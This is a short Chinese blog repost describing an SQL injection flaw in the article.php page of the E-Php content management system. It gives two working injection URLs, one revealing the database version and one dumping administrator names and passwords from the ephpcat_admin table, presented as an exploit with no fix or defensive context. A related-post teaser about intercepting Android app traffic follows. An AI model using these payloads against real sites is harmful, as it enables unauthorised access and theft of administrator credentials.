|
E-Php 内容管理系统 SQL 注射漏洞利用: E-Php 内容管理系统,E-Php Content Management System (CMS),article.php 页面存在 SQL 注射漏洞。 漏洞测试:Exploit http://127.0.0.1/article.php?es_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 http://127.0.0.1/article.php?es_id=-1+union+select+1,group_concat(es_admin_name,0x3a,es_pwd),3,4,5,6,7,8,9,10,11,12+from+ephpcat_admin |
文章来源于lcx.cc:【转载】E-Php内容管理系统sql注射漏洞利用
相关推荐: 论安卓手机抓包方案,手机应用抓包:哪个安卓虚拟机可以抓包的啊?
哪个安卓虚拟机可以抓包的啊? U神 (在乌云提问就是在成长!) | 2014-03-29 10:32 想玩玩APP,但是这破手机啊~连个代理都没有~ 想知道哪一款安卓虚拟机安装之后,可以通过真实机截图该虚拟安卓设备的数据包的~网上的试了下都不行~真郁闷~ [原…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论